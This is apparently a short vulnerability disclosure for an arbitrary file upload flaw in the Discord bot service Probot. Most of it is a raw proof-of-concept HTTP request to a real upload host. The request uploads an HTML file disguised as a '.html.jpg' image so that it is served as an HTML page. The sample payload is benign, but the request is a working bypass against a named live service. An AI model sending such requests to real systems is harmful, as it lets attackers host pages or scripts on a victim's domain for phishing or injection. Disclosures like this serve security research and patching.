Discord Probot Arbitrary File Upload
Discord Probot suffers from an arbitrary file upload vulnerability.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| # PoC:
POST / HTTP/1.1
Host: uploader.probot.io
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 333
Origin: https://probot.io
DNT: 1
Connection: close
Referer: https://probot.io/server/""/welcomer
-----------------------------
Content-Disposition: form-data; name="file"; filename="ste.html.jpg"
Content-Type: text/html
<!DOCTYPE html>
<html>
<head>
<title>bypasss</title>
</head>
<body>
<div>bypass</div>
</body>
</html>
-------------------------------
Note:the link of the file will be generated depend on the content type in this case .html
|